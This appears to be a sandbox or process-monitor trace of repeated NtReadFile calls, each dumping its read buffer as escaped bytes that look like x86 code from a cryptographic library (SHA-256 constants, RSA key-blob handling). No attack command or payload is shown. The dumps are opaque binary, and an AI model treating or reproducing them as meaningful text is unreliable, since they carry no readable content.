Buffer => \x85\xe2\x00\x00\x00\xe8\x1f\xf7\xff\xff\x85\xc0\x0f\x84\xd5\x00\x00\x00\x8d\x85\xa4\xfe\xff\xffP\xe8\x8e\x80\x00\x00j\x03h\x1c\xf8\x02h\x8d\x85\xa4\xfe\xff\xffP\xe8K\x8c\x00\x00\x8d\x85|\xff\xff\xffP\x8d\x85\xa4\xfe\xff\xffP\xe8h\x8d\x00\x00\x8b\xcb\xbf \xf8\x02h\x8d\xb5|\xff\xff\xff3\xc0\xf3\xa7\x0f\x85\x8c\x00\x00\x00\x8d\x85\xd4\xfd\xff\xffP\xe85\x8e\x00\x00j\x03h@\xf8\x02h\x8d\x85\xd4\xfd\xff\xffP\xe8R\xbd\x00\x00\x8d\x85L\xff\xff\xffP\x8d\x85\xd4\xfd\xff\xffP\xe8\xbf\xc5\x00\x00j\x0cY\xbfD\xf8\x02h\x8d\xb5L\xff\xff\xff3\xc0\xf3\xa7uF\x8d\x85\x04\xfd\xff\xffP\xe8\x7f\x8e\x00\x00j\x03ht\xf8\x02h\x8d\x85\x04\xfd\xff\xffP\xe8\x0c\xbd\x00\x00\x8d\x85\x0c\xff\xff\xffP\x8d\x85\x04\xfd\xff\xffP\xe8Y\xbe\x00\x00j\x10Y\xbfx\xf8\x02h\x8d\xb5\x0c\xff\xff\xff3\xc0\xf3\xa7t
\xb8 \x00 \x80\xe9\xfa\x01\x00\x00j\x00h\x8c\xf6\x02hj\x05h\x84\xf6\x02hj FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \x04\x00\x00\x8br\x10\x8b\xd1\xc1\xe9\x02\x8d\xb80\x03\x00\x00\xf3\xa5\x8b\xca\x83\xe1\x03\xf3\xa4\x8b\x8bH\x03\x00\x00\x89H\x04\x8b\x8bL\x03\x00\x00\x89H\x08\x8b\x8bP\x03\x00\x00\x89H\x0c\x8b\x8bT\x03\x00\x00\x89H\x10\x8b\x8bX\x03\x00\x00\x89H\x14\x8b\x8b\\x03\x00\x00\x89H\x18\x8b\x8b4\x01\x00\x00\x89\x88\x1c\x01\x00\x00\x8b\xd1\xc1\xe9\x02\x8ds4\x8dx\x1c\xf3\xa5\x8b\xca\x83\xe1\x03\xf3\xa4\x8b\x8b8\x02\x00\x00\x89\x88 \x02\x00\x00\x8b\xd1\xc1\xe9\x02\x8d\xb38\x01\x00\x00\x8d\xb8 \x01\x00\x00\xf3\xa5\x8b\xca\x83\xe1\x03\xf3\xa4\x8b\x8bD\x03\x00\x00\x89\x88,\x03\x00\x00\x8d\xb8,\x02\x00\x00\x8b\xc1\xc1\xe9\x02\x8d\xb3D\x02\x00\x00\xf3\xa5\x8b\xc8\x83\xe1\x03\xf3\xa4\xe9\x1b\x02\x00\x00\x8bJ\x0c\x89\x880\x04\x00\x00\x8br\x10\x8b\xd1\xc1\xe9\x02\x8d\xb80\x03\x00\x00\xf3\xa5\x8b\xca\x83\xe1\x03\xf3\xa4\x8b\x8bH\x03\x00\x00\x89H\x04\x8b\x8bL\x03\x00\x00\x89H\x08\x8b\x8bP\x03\x00\x00\x89H\x0c\x8b\x8bT\x03 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \x00+\xc1\x89u\xcc\x89U\xd8\x89U\xd0\x89U\xc4\x89U\xc0\x0f\x84H\x01\x00\x00\x83\xe8\x04t
\xbe\x08\x00 \x80\xe9\x97\x01\x00\x00\xf6\x834\x04\x00\x00\x01\x8b{\x0c\x8bC\x04\x89}\xd4\x89E\xc8\x0f\x84\xcd\x00\x00\x00\xffu\x14\x8dE\xf4P\x8dE\xd0P\x8dE\xdcP\x8dE\xccP\x8dE\xd4P\x8dE\xc4PS\xe8<\xfe\xff\xff\x85\xc0\x0f\x852\x01\x00\x00\x8bE\xcc\xf6E\x14\x01t\x07\xc7E\xc0\x01\x00\x00\x00\x8dM\xd8Qj\x01j\x00P\xff6W\xffu\xc0\xffu\xc8\xe8\xf8G\xff\xff\x85\xc0\x0f\x85\x03\x01\x00\x00\x81}\xc8\x02f\x00\x00u
\x8bE\xd8\xc7@l\x80\x00\x00\x00\x8b}\xd8\x8bM\xd0\x8b\xc1\xc1\xe9\x02\x83\xc7D\x8du\xdc\xf3\xa5\x8b\xc8\x83\xe1\x03\xf3\xa4\x8bE\xd8\x8bM\xd0\x89H@\x8b[\x18\x85\xdbt\x19\x8b}\xd8\x8b\xcb\x8b\xc1\xc1\xe9\x02\x83\xc7\x1c\x8du\xf4\xf3\xa5\x8b\xc8\x83\xe1\x03\xf3\xa4j\x00\xffu\xd8\xffu\xbc\xe8\xdbI\xff\xff\x85\xc0\x0f\x85\x85 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \x8b@\xfc\x89\x85\xdc\xfd\xff\xffj\x14Y3\xc0\x8d\xbd\xd0\xfc\xff\xff\xf3\xab\xc7\x85\xd0\xfc\xff\xff \x04\x00\xc0\x8bE\x04\x89\x85\xdc\xfc\xff\xff\x8d\x85\xd0\xfc\xff\xff\x89E\xf8\x8d\x85(\xfd\xff\xff\x89E\xfc\xa1\x84\x18\x03h\x89\x85 \xfd\xff\xff\xa1\x80\x18\x03h\x89\x85$\xfd\xff\xffj\x00\xff\x15\xd4\x10\x00h\x8dE\xf8P\xff\x15\xd8\x10\x00hh\x02\x05\x00\x00\xff\x15\xdc\x10\x00hP\xff\x15\xe0\x10\x00h_\xc9\xc3\xcc\xcc\xcc\xcc\xcc\x8b\xffU\x8b\xecV3\xf69u\x0cu\x0e95\x9c\x1a\x03h~-\xff
\x9c\x1a\x03h\x83}\x0c\x01\xa1\xf0\x11\x00h\x8b\x00\xa3\x00 \x03hu=h\x80\x00\x00\x00\xff\x15\xec\x11\x00h;\xc6Y\xa3\x08 \x03hu\x043\xc0\xebg\x890\xa1\x08 \x03hh\x08\xf0\x02hh\x00\xf0\x02h\xa3\x04 \x03h\xe8\xac\x01\x00\x00\xff\x05\x9c\x1a\x03hY\xeb?9u\x0cu;\xa1\x08 \x03h;\xc6t2\xeb\x13\x8b
\x04 \x03h\x8b ; FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => t3\xc63\xd6%\xfc\xfc\xfc\xfc\x81\xe2\xcf\xcf\xcf\xcf\x8a\xd8\x8a\xcc\xc1\xca\x04\x8b\xab\xb8\x18\x00h\x8a\xda3\xfd\x8b\xa9\xb8\x1a\x00h3\xfd\x8a\xce\xc1\xe8\x10\x8b\xab\xb8\x19\x00h3\xfd\x8a\xdc\xc1\xea\x10\x8b\xa9\xb8\x1b\x00h3\xfd\x8bl$\x1c\x8a\xce%\xff\x00\x00\x00\x81\xe2\xff\x00\x00\x00\x8b\x9b\xb8\x1e\x00h3\xfb\x8b\x99\xb8\x1f\x00h3\xfb\x8b\x98\xb8\x1c\x00h3\xfb\x8b\x9a\xb8\x1d\x00h3\xfb\x8bEx3\xdb\x8bU|3\xc73\xd7%\xfc\xfc\xfc\xfc\x81\xe2\xcf\xcf\xcf\xcf\x8a\xd8\x8a\xcc\xc1\xca\x04\x8b\xab\xb8\x18\x00h\x8a\xda3\xf5\x8b\xa9\xb8\x1a\x00h3\xf5\x8a\xce\xc1\xe8\x10\x8b\xab\xb8\x19\x00h3\xf5\x8a\xdc\xc1\xea\x10\x8b\xa9\xb8\x1b\x00h3\xf5\x8bl$\x1c\x8a\xce%\xff\x00\x00\x00\x81\xe2\xff\x00\x00\x00\x8b\x9b\xb8\x1e\x00h3\xf3\x8b\x99\xb8\x1f\x00h3\xf3\x8b\x98\xb8\x1c\x00h3\xf3\x8b\x9a\xb8\x1d\x00h3\xf3\x8bT$\x14\xd1\xce\x8b\xc73\xfe\x81\xe7\xaa\xaa\xaa\xaa3 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \x83\xf0\xff#\xc2\x03\xcd\x03\xc83\xc0f\xc1\xc1\x02f\x8b\xc1\x8b\xe8\x83\xf0\xff#\xeb#\xc7\x03\xd0\x8bF\x04\x03\xd0\xc1\xe8\x10\x03\xd5\x03\xf83\xc0f\xc1\xc2\x03f\x8b\xc2\x8b\xe8\x83\xf0\xff#\xc3#\xe9\x03\xf8\x03\xfd\x83\xc6\x08f\xc1\xc7\x05\x8b\xc7\xf7\xd0\x8b\xef#\xc1#\xea\x03\xd8\x8b\x06\x03\xdd\x03\xd8\xc1\xe8\x10\x8b\xef\x03\xc83\xc0f\xd1\xc3f\x8b\xc3#\xe8\x83\xf0\xff#\xc2\x03\xcd\x03\xc83\xc0f\xc1\xc1\x02f\x8b\xc1\x8b\xe8\x83\xf0\xff#\xeb#\xc7\x03\xd0\x8bF\x04\x03\xd0\xc1\xe8\x10\x03\xd5\x03\xf83\xc0f\xc1\xc2\x03f\x8b\xc2\x8b\xe8\x83\xf0\xff#\xc3#\xe9\x03\xf8\x03\xfd\x83\xc6\x08f\xc1\xc7\x05\xe9h\x06\x00\x00\x8d\xa4$\x00\x00\x00\x00\x90\x83\xc6xf\xc1\xcf\x05\x8b\xc2\x8b\xea\x83\xf0\xff#\xe9#\xc3f\xc1\xca\x03\x03\xc5+\xf8\x8bF\x04\x8b\xe9+\xd0\xc1\xe8\x10+\xf8\x8b\xc1\xf7\xd5#\xc3#\xef\x03\xe8f\xc1\xc9\x02+\xd5\x8b\xc3\x8b\xef\xf7\xd0#\xeb#\xc2f\xd1\xcb\x03 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => h34\x9d\xd81\x00h\x8b]\xf8\xc1\xeb\x08\x0f\xb6\xdb34\x9d\xd8-\x00h\x0f\xb6]\xf434\x9d\xd8)\x00h\x0f\xb6]\xf2\x89p\x08\x0f\xb6u\xf7\x8b4\xb5\xd85\x00h34\x9d\xd81\x00h\x0f\xb6\xd6\x8b\x1c\x95\xd8-\x00h\x0f\xb6U\xf83\xf334\x95\xd8)\x00h\x8bX\x04\x89p\x0c\x8b0\x8bQ\x083\xd6\x8bq\x0c3\xf3\x8bX\x08\x89u\xf0\x8bq\x103\xf3\x8bX\x0c\x89u\xf4\x8bq\x14\x89U\xec3\xf3\x89u\xf8\x8b]\xf4\xc1\xee\x18\x8b4\xb5\xd85\x00h\xc1\xeb\x10\x0f\xb6\xdb34\x9d\xd81\x00h\x8b]\xf0\xc1\xeb\x08\x0f\xb6\xdb34\x9d\xd8-\x00h\x0f\xb6\xda34\x9d\xd8)\x00h\x8b]\xf8\x890\xc1\xeb\x10\x0f\xb6\xdb\x8b\xf2\xc1\xee\x18\x8b4\xb5\xd85\x00h34\x9d\xd81\x00h\x8b]\xf4\xc1\xeb\x08\x0f\xb6\xdb34\x9d\xd8-\x00h\x0f\xb6]\xf034\x9d\xd8)\x00h\x0f\xb6]\xee\x89p\x04\x8bu\xf0\xc1\xee\x18\x8b4\xb5\xd85 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xc7E\xe8\x02\x00\x00\x00\xeb\x03\x8dI\x00\x8bQ\xf83\x10\x8bq\xfc3p\x04\x89u\xf0\x8b9\x8bp\x083\xf7\x89u\xf4\x8bY\x043X\x0c\x8bu\xf0\x0f\xb6}\xf6\xc1\xee\x18\x8b4\xb5\xd8E\x00h34\xbd\xd8A\x00h\x0f\xb6\xff34\xbd\xd8=\x00h\x0f\xb6\xfa34\xbd\xd89\x00h\x89U\xec\x890\x8bu\xf4\xc1\xee\x18\x8b4\xb5\xd8E\x00h\x89]\xf8\x0f\xb6}\xfa34\xbd\xd8A\x00h\x0f\xb6\xd6\x8b<\x95\xd8=\x00h\x8bU\xf03\xf7\x0f\xb6\xfa34\xbd\xd89\x00h\x0f\xb6}\xee\x89p\x04\x8b\xf3\xc1\xee\x18\x8b4\xb5\xd8E\x00h34\xbd\xd8A\x00h\x0f\xb6\xd6\x8b<\x95\xd8=\x00h\x8bU\xf43\xf7\x0f\xb6\xfa34\xbd\xd89\x00h\x0f\xb6}\xf2\x89p\x08\x0f\xb6u\xef\x8b4\xb5\xd8E\x00h34\xbd\xd8A\x00h\x0f\xb6\xd634\x95\xd8=\x00h\x0f\xb6\xd3\x8b<\x95\xd89\x00h\x8bX\x043\xf7\x8bx\x08\x89p\x0c\x8b0\x8bQ\xe83 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xc8\x8b\xf1\xc1\xe9\x02\x8d|\x05\xbc3\xc0\xf3\xab\x8b\xce\x83\xe1\x03\xf3\xaa\x8b]\xb4\x8bu\xb8\xb9\x07\x00\x00\x00+\xcb\x8a\\x15\xbc\xb8\x01\x00\x00\x00\xd3\xe0\x8a\xc8\xfe\xc9
\xd8\xf6\xd1"\xcb\x83\xfa7\x88L\x15\xbc[v6\x8dU\xbcRV\xe8\x91a\x00\x003\xc0\x89E\xbc\x89E\xc0\x89E\xc4\x89E\xc8\x89E\xcc\x89E\xd0\x89E\xd4\x89E\xd8\x89E\xdc\x89E\xe0\x89E\xe4\x89E\xe8\x89E\xec\x89E\xf0\x8bN\x10\x8bV\x14\x8dE\xbcPV\x89M\xf4\x89U\xf8\xe8Oa\x00\x00\x8bM\xfc_\xc7F\x18\x01\x00\x00\x003\xc0^\xe8\xc5\xae\xff\xff\x8b\xe5]\xc2\x0c\x00\xcc\xcc\xcc\xcc\xcc\xcc\x8b\xffU\x8b\xec\x8bE\x083\xc9\xc7\x00g\xe6 j\xc7@\x04\x85\xaeg\xbb\xc7@\x08r\xf3n<\xc7@\x0c:\xf5O\xa5\xc7@\x10\x7fR\x0eQ\xc7@\x14\x8ch\x05\x9b\xc7@\x18\xab\xd9\x83\x1f\xc7@\x1c\x19\xcd\xe0[\x89H \x89H$]\xc2\x04\x00\xcc\xcc\xcc\xcc\xcc\x8b\xffU\x8b FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xff\xff\x89}\xd8\x8bx\x1c\x89\x95<\xfc\xff\xff\x89U\xb4\x8bP \x89\xbd@\xfc\xff\xff\x89}\xb8\x8bx$\x89\x95|\xfc\xff\xff\x89U\xdc\x8bP(\x89\xbd\x80\xfc\xff\xff\x89}\xe0\x8bx,\x89\x95L\xfc\xff\xff\x89U\xbc\x8bP0\x89\x8d\x9c\xfc\xff\xff\x89M\xcc\x8bH\x0c\x89\xbdP\xfc\xff\xff\x89}\xc0\x8bx4\x89\x95l\xfc\xff\xff\x89U\xc4\x8bP8\x8b@<\x89\x850\xfc\xff\xff\x89E\xf0\x89\x8d`\xfc\xff\xff\x89\xbdp\xfc\xff\xff\x89}\xc8\x89\x95,\xfc\xff\xff\x89U\xec3\xc0\xeb\x03\x8bu\x0c\x8b\x1e\x8bV\x04\x83\xc6\x08\x89u\x0c3\xf6\x0b\xd63\xff\x0b\xfb\x8b\xda\x89]\x94\x89}\x98\x8b\xf7\x0f\xa4\xdf\x08\x0f\xac\xf2\x08\xc1\xe3\x083\xd3\x8b]\x98\xc1\xee\x083\xf7\x8b}\x94\x0f\xa4\xfb\x08\x81\xe2\xff\x00\xff\x00\xc1\xe7\x083\xd7\x8b\xfa\x89U\x94\x81\xe6\xff\x00\xff\x003\xf3\x8b\xde\x0f\xac\xdf\x10\xc1\xeb\x10\x89u\x98\x0f\xa4\xd6\x103\xde\x8bu\x98\xc1\xe2\x103\xfa\x8bU FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xcc\x89\x8d\x88\xfc\xff\xff\x8b\xce\xf7\xd1#\xcb\x8b]\xd0\xf7\xd2#\xd3\x8b]\xec#\xde\x8bu\xf0#u\xc83\xcb\x8b\x9dp\xfe\xff\xff3\xd63\xbdl\xfe\xff\xff\x8b\xb5\x88\xfc\xff\xff3\xf33\xbd\\xfe\xff\xff3\xb5`\xfe\xff\xff\x8b\x1c\xc5T[\x00h\x03\xcf\x8b\xbc\xc5\xac\xfc\xff\xff\x13\xd6\x03\x0c\xc5P[\x00h\x8b\xb4\xc5\xb0\xfc\xff\xff\x13\xd3\x8b]\xa4\x03\xcf\x8b}\xa8\x13\xd6\x8bu\xbc\x03\xcb\x13\xd7\x03\xf1\x89M\xe4\x8bM\xc0\x13\xca\x89u\xbc\x89U\xe8\x8bU\xd8\x89M\xc0\x8bM\xd4\x8b\xf2\x8b\xf9\x0f\xac\xf7\x1c\x0f\xac\xce\x1c\x89\xb5P\xfe\xff\xff\x8b\xf2\x89\xbdL\xfe\xff\xff\x8b\xfe\x8b\xf1\x89}\xfc\x0f\xac\xf7\x02\x89\xbdt\xfc\xff\xff\x8b\xfa\x0f\xac\xfe\x02\x8b\xbdt\xfc\xff\xff\x89\xb50\xfe\xff\xff\x89\xbd,\xfe\xff\xff\x8b\xf2\x8b\xfa\x8b\xdf\x8b\xf1\x0f\xac\xf3\x07\x0f\xac\xfe\x07\x89\x9d<\xfe\xff\xff\x8b]\xb83\xda#]\xe0\x89\xb5@\xfe\xff\xff\x8bu\xb4\x8b\xfe#\xf13\xf9# FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xbc\x8b\xd6\x8b\xf9\x0f\xac\xd7\x1c\x0f\xac\xca\x1c\x89\x95H\xfe\xff\xff\x89\xbdD\xfe\xff\xff\x8b\xd6\x8b\xfe\x89}\xf8\x8b\xd1\x0f\xac\xd7\x02\x89\xbd\xb4\xfa\xff\xff\x8b\xfe\x0f\xac\xfa\x02\x8b\xbd\xb4\xfa\xff\xff\x89\x95\xb8\xfe\xff\xff\x8b\xd6\x89\xbd\xb4\xfe\xff\xff\x8b\xfa\x8b\xd1\x8b\xdf\x0f\xac\xd3\x07\x0f\xac\xfa\x07\x89\x9d\x04\xfe\xff\xff\x8b]\xc83\xde#]\xf0\x89\x95\x08\xfe\xff\xff\x8bU\xc4\x8b\xfa#\xd13\xf9#}\xec\x8bM\xc83\xfa\x8b\x95\xb4\xfe\xff\xff#\xce3\xd9\x8b\x8d\x04\xfe\xff\xff3\xca3\x8dD\xfe\xff\xff\x8b\x95\x08\xfe\xff\xff3\x95\xb8\xfe\xff\xff3\x95H\xfe\xff\xff\x03\xf9\x13\xda\x8bU\xe4\x8bM\xe8\x03\xfa\x13\xd9\x8bM\xfc\x89]\xe0\x8b]\x0c\x89}\xdc\x8b}\xa0@AC\x89M\xfc\x89]\x0c\x83\xe1\x0f\x8b\x94\xcd\xac\xfc\xff\xff\x8b\x8c\xcd\xb0\xfc\xff\xffG\x8b\xda\x89}\xa0\x8b\xf9\x0f\xac\xfb\x01\x89\x9dT\xfb\xff\xff\x8b\xda\x0f\xac\xdf\x01\x8b\x9dT\xfb\xff\xff\x89\x9d\xc4\xfe\xff\xff\x8b\xda FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xff\x0f\xa4\xd7\x08%\xff\x00\xff\x00\xc1\xe2\x083\xc2\x81\xe1\xff\x00\xff\x003\xcf\x8b\xd0\x89\x85T\xff\xff\xff\x8b\xf9\x0f\xac\xfa\x10\x89\x8dX\xff\xff\xff\x0f\xa4\xc1\x10\xc1\xe0\x103\xd0\x8b\x85T\xff\xff\xff\xc1\xef\x103\xf9\x8b\x8dX\xff\xff\xff\x0f\xa4\xc1\x10\xc1\xe0\x10\x81\xe2\xff\xff\x00\x003\xd0\x8b\x85P\xff\xff\xff\x81\xe7\xff\xff\x00\x003\xf9\xc6\x85l\xff\xff\xff\x80\x89\x94\x05\\xff\xff\xff\x89\xbc\x05`\xff\xff\xff\x8b\xbdh\xff\xff\xff3\xc0\x0b\xf8\x8b\x85d\xff\xff\xff3\xd2\x0b\xd0\x89\x95X\xff\xff\xff\x89\xbdT\xff\xff\xff\x8b\xcf\x8b\xc2\x0f\xac\xc1\x08\x0f\xa4\xfa\x08\xc1\xe8\x08\x89\x85h\xff\xff\xff\x8b\xc1\x8b\x8dh\xff\xff\xff3\xca\x8b\x95T\xff\xff\xff\xc1\xe7\x083\xc7\x8b\xbdX\xff\xff\xff\x0f\xa4\xd7\x08%\xff\x00\xff\x00\xc1\xe2\x083\xc2\x81\xe1\xff\x00\xff\x003\xcf\x8b\xd0\x89\x85T\xff\xff\xff\x8b\xf9\x0f\xac\xfa\x10\x89\x8dX\xff\xff\xff\x0f\xa4\xc1\x10\xc1\xe0\x103\xd0\x8b\x85T\xff\xff\xff FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \x00h\x84\xdb\x8b\xd7\x8b\xf1t\x0e\xc1\xe6\x1a\xc1\xe9\x02\xc1\xe2\x1a\xc1\xef\x02\xeb
\xc1\xe6\x1b\xd1\xe9\xc1\xe2\x1b\xd1\xef\x0b\xd7\x0b\xf1\x81\xe6\xff\xff\xff\x0f\x8b\xce\xd1\xe9\x8b\xf9\x81\xe7\x00\x00\x00\x07\x89M\x0c\x8b\xde\x81\xe3\x00\x00\xc0\x00\x0b\xfb\xd1\xef\x8b\xde\x81\xe3\x00\x00\x10\x00\x0b\xfb\xc1\xef\x14\x8b\xd9\x81\xe3\x00\x00\x06\x00\x8b\xce\x81\xe1\x00\xe0\x01\x00\x0b\xd9\x8b\x0c\xbd\xb8#\x00h\xc1\xeb
\x0b\x0c\x9d\xb8"\x00h\x8b}\x0c\x81\xe7\x00\x0f\x00\x00\x81\xe2\xff\xff\xff\x0f\x8b\xde\x81\xe3\xc0\x00\x00\x00\x0b\xfb\xc1\xef\x06\x0b\x0c\xbd\xb8!\x00h\x8b\xfe\x83\xe7?\x0b\x0c\xbd\xb8 \x00h\x8b\xfa\xd1\xef\x89}\xfc\x81\xe7\x00\x00\x00\x06\x8b\xda\x81\xe3\x00\x00\xe0\x01\x0b\xfb\x8b]\xfc\x81\xe3\x00\x1e\x00\x00\x89U\x08\x81\xe2\x80\x01\x00\x00\x0b\xda\xc1\xef\x15\x8b\x14\xbd\xb8'\x00h\xc1\xeb\x07\x0b\x14\x9d\xb8%\x00h\x8b}\x08\x8b\xdf\xc1\xeb\x0f\x83\xe3?\x0b\x14\x9d\xb8&\x00h\x83\xe7?\x0b\x14\xbd\xb8$\x00 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xec\x8bE\x10\x8b\x08\xf6\xc1\x01u9\x83\xf9 r4\xd1\xe9\x89\x08\x8b\xc1\xc1\xe8\x05@\xf6\xc1\x1ft\x01@\x8d\x0c\x80\x8d\x14\xcd\x14\x00\x00\x00\x8bM\x0c\x89\x11\x8d\x14\xc5\x14\x00\x00\x00\x8bE\x08\x89\x10\xb8\x01\x00\x00\x00]\xc2\x0c\x003\xc0]\xc2\x0c\x00\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\x8b\xffU\x8b\xec\x81\xec\x90\x00\x00\x00S\x8b]\x08\x8b\x03W3\xff=RSA1\x89}\xfct
_3\xc0[\x8b\xe5]\xc2\x0c\x00\x8bC\x08\xd1\xe8V\x8b\xf0\xc1\xee\x05F\xa8\x1ft\x01F\x8bK\x10\xb8\x01\x00\x00\x00;\xc8\x8d\x0c6u\x11\x8bu\x0c\x8b}\x10\xf3\xa5^_[\x8b\xe5]\xc2\x0c\x00\x8dC\x14QP\x89E\xf8\x8bE\x0cP\x89M\x08\xe8#\x08\x00\x00\x85\xc0}b\xc1\xe6\x03\x81\xfe\x88\x00\x00\x00v\x14Vj\x00\xff\x15\x00\x11\x00h\x85\xc0\x89E\xfctG\x8b\xd0\xeb\x06\x8d\x95p\xff\xff\xff3\xc0\x8b\xce\xc1\xe9\x02\x8b\xfa\xf3\xab\x8b\xce\x83 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xd5\xf8\xff\xff\xff\x89M\x14\xeb\x06\x8bu\xf4\x8bE\x10\x8bM\xcc3\xd2\x8a4\x06\x8aT\x06\xff\x8b\xc2\xc1\xea\x08;\xcau
\xbe\xff\x00\x00\x00\x89u\x1c\xeb 3\xd2\xf7\xf1\x89E\x1c\x8b\xf0\x8b\xc6%\x00\x00\x00\x80\xf7\xd8\x1a\xc0\x8bM\xfc\x8b}\xf8\x89]\xd8\x8d\x0c\x8d\xfc\xff\xff\xff\x8b\xd1\x897%\xff\x00\x00\x00\x0f\xb6\xc0\x8a\xd8\x8bu\xfc\x8a\xfb\xc1\xe9\x02\x83\xc7\x04V\x8b\xc3\xc1\xe0\x10f\x8b\xc3\x8b]\xd8\xf3\xab\x8b\xca\x83\xe1\x03\xf3\xaa\x8bE\xf8\x8bM\xf0PQS\xe8\xfd\xf6\xff\xff\x8b}\xec\x8d\x0c\xb5\x00\x00\x00\x00\x8b\xd1\xc1\xe9\x023\xc0\xf3\xab\x8b\xca\x83\xe1\x03\xf3\xaa\x8bE\x14\x8b}\xec\x8b\xc8\x83\xe1\x1f\xba\x01\x00\x00\x00\xd3\xe2V\xc1\xe8\x05S\x89\x14\x87\x8bE\xf8WP\xe8\xbf\xf6\xff\xff\x8bM\xf8\x8bU\xf4VQRS\xe8T\x04\x00\x00\x8bG\xfc\x85\xc0y)\x8bE\xf0\x8bM\xf8VPWQ\xe8\x9a\xf6\xff\xff\x8bU\xf8VRSS\xe8\xee\x03\x00\x00\x8bM FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \x00+\xc1\x83\xd2\x00\x89D\xaf\x0c\x8b\xca\x83\xc5\x04u\x96]\x8b\xc1_^[]\xc2\x10\x00\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\x8b\xffU\x8b\xecSVW\x8bu\x0c\x8b}\x08\x8bM\x103\xdb\x8b\x06\x83\xc6\x04\xf7\xe0\x03\xd8\x8b\x07\x83\xd2\x00\x03\xc3\x8b_\x04\x83\xd2\x00\x89\x07\x03\xd3\xbb\x00\x00\x00\x00\x89W\x04\x83\xd3\x00\x83\xc7\x08Iu\xd5_^[]\xc2\x0c\x00\xcc\xcc\xcc\xcc\xccj\x08hx`\x00h\xe8\x9e1\xff\xff\x83e\xfc\x00\xffu\x08\xff\x15\xb4\x11\x00h\x83M\xfc\xff3\xc0\xeb\x1e\x8bE\xec\x8b\x00\x8b\x003\xc9=\x17\x00\x00\xc0\x0f\x94\xc1\x8b\xc1\xc3\x8be\xe8\x83M\xfc\xffj\x08X\xe8\xa11\xff\xff\xc2\x04\x00\xcc\xcc\xcc\xcc\xcc\x8b\xffU\x8b\xec]\xff%\xb8\x11\x00h\xcc\xcc\xcc\xcc\xcc\x8b\xffU\x8b\xec\x83\xec@VWj\x0eY3\xc0\x8d}\xc0\xf3\xab\x8dE\xfcPj\x013\xf6!u\xfc!u\xf8j\x08\xff\x15\x08\x11\x00hP\xff\x15 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xff\xff\xff\xd6\x85\xc0t%\x8d\x85\xe4\xfb\xff\xffPSSSSSSSj\x123\xf6FV\x8d\x85\xf4\xfb\xff\xffP\xff\x15D\x10\x00h\x85\xc0u
\xff\x15\xc8\x11\x00h\x8b\xf8\xeb\x1c\x8b\x85\xdc\xfb\xff\xff\xff0\xff\xb5\xe4\xfb\xff\xff\xff\x15P\x10\x00h\x85\xc0t\x02\x8973\xff9\x9d\xe0\xfb\xff\xfft\x0b\xff\xb5\xe0\xfb\xff\xff\xe8I\xf1\xff\xff9\x9d\xe4\xfb\xff\xfft\x0c\xff\xb5\xe4\xfb\xff\xff\xff\x15$\x10\x00h9\x9d\xe8\xfb\xff\xff\x8b5\x04\x11\x00ht\x08\xff\xb5\xe8\xfb\xff\xff\xff\xd69\x9d\xf0\xfb\xff\xfft\x08\xff\xb5\xf0\xfb\xff\xff\xff\xd6\x8bM\xfc\x8b\xc7_^[\xe8\xb8\x1e\xff\xff\xc9\xc2\x04\x00\xcc\xcc\xcc\xcc\xcc\x8b\xffU\x8b\xec\x81\xec \x04\x00\x00\xa1\x84\x18\x03hS\x89E\xfcV3\xdb\x8d\x85\xfc\xfb\xff\xffW\x8b}\x08\x89\x85\xe0\xfb\xff\xff\x8d\x85\xf0\xfb\xff\xffPj\x08\x89\x9d\xf0\xfb\xff\xff\xc7\x85\xec\xfb\xff\xff\x00\x04\x00\x00\x89\x9d\xe4\xfb\xff\xff\x89\x9d\xe8\xfb FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
